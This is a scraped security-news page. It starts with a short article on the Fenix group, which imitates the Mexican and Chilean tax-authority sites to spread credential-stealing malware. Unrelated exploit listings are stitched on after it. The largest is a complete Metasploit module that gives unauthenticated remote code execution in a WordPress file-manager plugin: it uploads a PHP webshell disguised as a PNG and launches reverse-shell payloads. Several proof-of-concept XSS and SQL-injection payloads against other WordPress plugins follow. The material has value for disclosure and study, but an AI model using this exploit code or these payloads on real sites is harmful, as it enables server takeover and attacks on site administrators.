Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name Fenix to breach targeted networks and steal valuable data.
A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to

Online Security / Malware

Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name **Fenix** to breach targeted networks and steal valuable data.

A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to those sites.

"These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety," Metabase Q security researchers Gerardo Corona and Julio Vidal said in a recent analysis.

"However, unbeknownst to the victims, this download actually installs the initial stage of malware, ultimately enabling the theft of sensitive information such as credentials."

The goal of Fenix, according to the Latin America-focused cybersecurity firm, is to act as an initial access broker and get a foothold into different companies in the region, and sell the access to ransomware affiliates for further monetization.

Evidence gathered so far points to the threat actor orchestrating phishing campaigns coinciding with government activities during the year since at least the fourth quarter of 2022.

The mechanics of the campaign proceeds thus: Visitors landing on the impersonated websites are urged to download software that supposedly safeguards their data while browsing the portal. Alternatively, users are lured via phishing sites set up to download legitimate apps like AnyDesk.

"\[Fenix\] compromises weak websites using vulnerable WordPress engines and also creates new domains to launch phishing campaigns," the researchers said, adding the group "creates typosquatting domains similar to known apps like AnyDesk, WhatsApp, etc."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

But in reality, the ZIP file containing the purported software is used as a springboard to activate an infection sequence that leads to the execution of an obfuscated PowerShell script, which, in turn, loads and runs a .NET binary, after which the message "Ahora se encuentra protegido" (meaning "Now you are protected" in Spanish) is displayed to keep up the ruse.

The .NET executable subsequently paves the way for establishing persistence on the compromised host and deploying a botnet malware that's capable of running commands received from a remote server, loading a stealer module that exfiltrates credentials stored in web browsers and crypto wallets, and ultimately deleting itself.

"We are seeing new malicious groups being created in LATAM to provide initial access to ransomware gangs," the researchers concluded. "These local actors are not amateur and will increase their technical expertise and therefore more difficult to track, detect and eradicate, it is important to anticipate their actions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fenix Cybercrime Group Poses as Tax Authorities to Target Latin American Users

The Video Conferencing with Zoom plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'vczapi_encrypt_decrypt' function in versions up to, and including, 4.2.1. This makes it possible for unauthenticated attackers to decrypt and view the meeting id and password.

CVE-2023-3947

WordPress File Manager Advanced Shortcode plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to remote code execution in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users, but it also works in an authenticated configuration. Versions 2.3.2 and below are affected. To install the Shortcode plugin File Manager Advanced version 5.0.5 or lower is required to keep the configuration vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system with the same privileges under which the Wordpress web services run.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode',        'Description' => %q{          The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.          This leads to RCE in cases where the allowed MIME type list does not include PHP files.          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system          with the same privileges under which the Wordpress web services run.         },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Mateus Machado Tesser' # discovery        ],        'References' => [          ['CVE', '2023-2068'],          ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068'],          ['PACKETSTORM', '172707'],          ['WPVDB', '58f72953-56d2-4d86-a49b-311b5fc58056']        ],        'License' => MSF_LICENSE,        'Platform' => ['windows', 'unix', 'linux', 'php'],        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'Linemax' => 65535,              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 3000,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-05-31',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'File Manager Advanced (FMA) Shortcode URI path', '/']),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension php. Webshell name will be randomly generated if left unset.', nil        ]),        OptEnum.new('COMMAND',                    [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])      ]    )  end  def get_form_data(png_webshell)    # construct multipart form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="reqid"')    form_data.add_part('upload', nil, nil, 'form-data; name="cmd"')    form_data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    form_data.add_part('fma_load_shortcode_fma_ui', nil, nil, 'form-data; name="action"')    form_data.add_part(@wp_data['fmakey'].to_s, nil, nil, 'form-data; name="_fmakey"')    form_data.add_part(@upload_path.to_s, nil, nil, 'form-data; name="path"')    form_data.add_part('', nil, nil, 'form-data; name="url"')    form_data.add_part('false', nil, nil, 'form-data; name="w"')    form_data.add_part('true', nil, nil, 'form-data; name="r"')    form_data.add_part('plugins', nil, nil, 'form-data; name="hide"')    form_data.add_part('upload,download', nil, nil, 'form-data; name="operations"')    form_data.add_part('inside', nil, nil, 'form-data; name="path_type"')    form_data.add_part('no', nil, nil, 'form-data; name="hide_path"')    form_data.add_part('no', nil, nil, 'form-data; name="enable_trash"')    form_data.add_part('image/png,text/x-php', nil, nil, 'form-data; name="upload_allow"')    form_data.add_part('2G', nil, nil, 'form-data; name="upload_max_size"')    form_data.add_part(png_webshell.to_s, 'image/png, text/x-php', 'binary', "form-data; name=\"upload[]\"; filename=\"#{@webshell_name}\"")    form_data.add_part('', nil, nil, 'form-data; name="mtime[]"')    return form_data  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    payload = if target['Type'] == :php                "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"              else                "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"              end    # inject PHP payload into the PLTE chunk of the PNG image to bypass security such as Wordfence    png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')    if png_webshell.nil?      return false    end    # Upload payload in Wordpress root for execution    # try again at the configured upload directory if LFI fails    @upload_path = ''    no_break = true    loop do      form_data = get_form_data(png_webshell)      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri('/', @wp_data['baseurl'], 'wp-admin', 'admin-ajax.php'),        'ctype' => "multipart/form-data; boundary=#{form_data.bound}",        'data' => form_data.to_s      })      if res && res.code == 200 && !res.body.blank?        # parse json to find the webshell name embedded in the response at the "added" section that indicates a successful upload        res_json = res.get_json_document        return false if res_json.blank?        return true if res_json.dig('added', 0, 'name') == @webshell_name        # If we face an upload permission error, use the configured upload directory path to upload the payload        # We might not have execution rights there, but at least we can try ;-)        if res_json.dig('warning', 0) == 'errUploadFile' && res_json.dig('warning', 2) == 'errPerm' && no_break          @upload_path = @wp_data['path']          no_break = false        else          return false        end      else        return false      end    end  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def check_fma_shortcode_plugin    # check if fma shortcode plugin is installed and return fmakey, upload directory path and Wordpress base url    @wp_data = {}    res = send_request_cgi!({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'])    })    if res && res.body && res.code == 200      # 1. Get the fmakey information by searching for strings:      # /_fmakey: '1555ef603c',/ or /_fmakey:'1555ef603c',/ or /"fmakey":"1555ef603c",/      fmakey_match1 = res.body.match(/_fmakey:.*'.*',/)      fmakey_match2 = res.body.match(/"fmakey":".*",/)      return if fmakey_match1.nil? && fmakey_match2.nil?      if fmakey_match1        @wp_data['fmakey'] = fmakey_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip      else        @wp_data['fmakey'] = fmakey_match2[0].split(',')[0].split(':')[1].tr('"', '').strip      end      # 2. Get the upload directory path information by searching for strings:      # /path: 'upload',/ or /path:'upload',/ or /"path":"upload",/      path_match1 = res.body.match(/path:.*'.*',/)      path_match2 = res.body.match(/"path":".*",/)      return if path_match1.nil? && path_match2.nil?      if path_match1        @wp_data['path'] = path_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip      else        @wp_data['path'] = path_match2[0].split(',')[0].split(':')[1].tr('"', '').strip      end      # 3. Determine Wordpress baseurl      # search in html content for:      # <script src='http(s)://ip/<wp-base>/wp-content/plugins/file-manager-advanced-shortcode/js/shortcode.js?ver=6.2.2' id='fma-shortcode-js-js'></script>      # split off /wp-content and http(s)://ip part to determine the <wp-base> which can be empty.      baseurl_match = res.body.match(%r{src=.*wp-content/plugins/file-manager-advanced-shortcode/})      return if baseurl_match.nil?      @wp_data['baseurl'] = baseurl_match[0].split('/wp-content')[0].split('/')[3]    end  end  def check    return CheckCode::Safe('Server not online or not detected as WordPress.') unless wordpress_and_online?    check_fma_shortcode_plugin    return CheckCode::Safe("Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?    CheckCode::Appears("fmakey successfully retrieved: #{@wp_data['fmakey']}")  end  def exploit    # check if fmakey is already set from the check method otherwise try to find the key.    check_fma_shortcode_plugin unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, "Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    register_file_for_cleanup(@webshell_name.to_s)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

WordPress File Manager Advanced Shortcode 2.3.2 Remote Code Execution

WordPress WP Brutal AI plugin versions prior to 2.0.1 suffer from a cross site scripting vulnerability.

    Tittle:WordPress Plugin WP Brutal AI < 2.0.1 - Admin + Reflected XSSReferences:CVE-2023-2605Author:Taurus Omar Description:The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.Affects Plugins:WP Brutal AI- Fixed in version 2.0.0Proof of Concept:Send an HTTP request with the following:```POST https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 86Cookie: [Admin+]search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&status=```Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/372cb940-71ba-4d19-b35a-ab15f8c2fdeb

WordPress WP Brutal AI Cross Site Scripting

WordPress WP Brutal AI plugin versions prior to 2.0.0 suffer from cross site request forgery and remote SQL injection vulnerabilities.

    Tittle:WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRFReferences:CVE-2023-2601Author:Taurus Omar Description:The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.Affects Plugins:WP Brutal AI - Fixed in version 2.0.0Proof of Concept:When there is a created campaign, access the following link as an admin:https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29 Classification:Type SQLi OWASP top 10 A1: Sql Injection (SQLi)CWE-89wpScan:https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd

WordPress WP Brutal AI Cross Site Request Forgery / SQL Injection

WordPress SEO Alert plugin versions 1.59 and below suffer from a persistent cross site scripting vulnerability.

    Tittle:WordPress Plugin SEO ALert <= 1.59 - Admin+ Stored XSSReferences:CVE-2023-2225Author:Taurus Omar Description:The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).Affects Plugins:SEO ALert - No known fix - plugin closedProof of Concept:1. Go to Vanilla Beans » SEO Alert. 2. In "Slack Alert for" » "Slack Channel" add payload: "><audio src=x onerror=confirm("XSS")> 3. Save to get the XSS trigger. Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/0af475ba-5c02-4f62-876d-6235a745bbd6

WordPress SEO Alert 1.59 Cross Site Scripting

WordPress WP Brutal AI plugin versions prior to 2.06 suffer from a persistent cross site scripting vulnerability.

    Tittle:WordPress Plugin WP Brutal AI < 2.06 - Admin+ Stored XSSReferences:CVE-2023-2606Author:Taurus Omar Description:The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).Affects Plugins:WP Brutal AI - Fixed in version 2.06Proof of Concept:Visit the following path:1. Go to Settings » WP Brutal AI2. Add new campaign 4. Add name payload: "><iframe src="<svg onload=alert(4);>">  3. Save the changes to trigger XSS. Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/62deb3ed-a7e4-4cdc-a615-cad2ec2e1e8f

WordPress PrePost SEO plugin versions 3.0 and below suffer from a persistent cross site scripting vulnerability.

    Tittle:WordPress Plugin PrePost SEO <= 3.0 - Admin + Stored Cross-Site ScriptingReferences:CVE-2023-2029Author:Taurus Omar Description:The plugin does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)Affects Plugins:PrePost SEO - No known fix - plugin closedProof of Concept:1. Add XSS payload to plugin's "Account API key" setting: "><iframe src="<svg onload=alert(4);>">2. Save and see XSS exploit. Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/4889ad5a-c8c4-4958-b176-64560490497b

WordPress PrePost SEO 3.0 Cross Site Scripting

WordPress Tablesome plugin versions prior to 1.0.9 suffer from a cross site scripting vulnerability.

    Tittle:WordPress Plugin Tablesome < 1.0.9 - Reflected XSSReferences:CVE-2023-1890Author:Taurus Omar Description:The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site ScriptingAffects Plugins:Tablesome - Fixed in version 1.0.9Proof of Concept:Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yethttps://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3Ehttps://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script> Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d

WordPress Tablesome Cross Site Scripting

WordPress Login Rebuilder plugin versions prior to 2.8.1 suffer from a persistent cross site scripting vulnerability.

    Tittle:WordPress Plugin Login Rebuilder < 2.8.1 - Admin+ Stored XSSReferences:CVE-2023-2223Author:Taurus Omar Description:The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).Affects Plugins:Login Rebuilder - Fixed in version 2.8.1Proof of Concept:1. Go to Settings » Login rebuilder 2. In Login file keyword, add payload: "><iframe src="<svg onload=alert(4);>"> 3. Save the changes to trigger XSS. Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/7b356b82-5d03-4f70-b4ce-f1405304bb52

Tag

#wordpress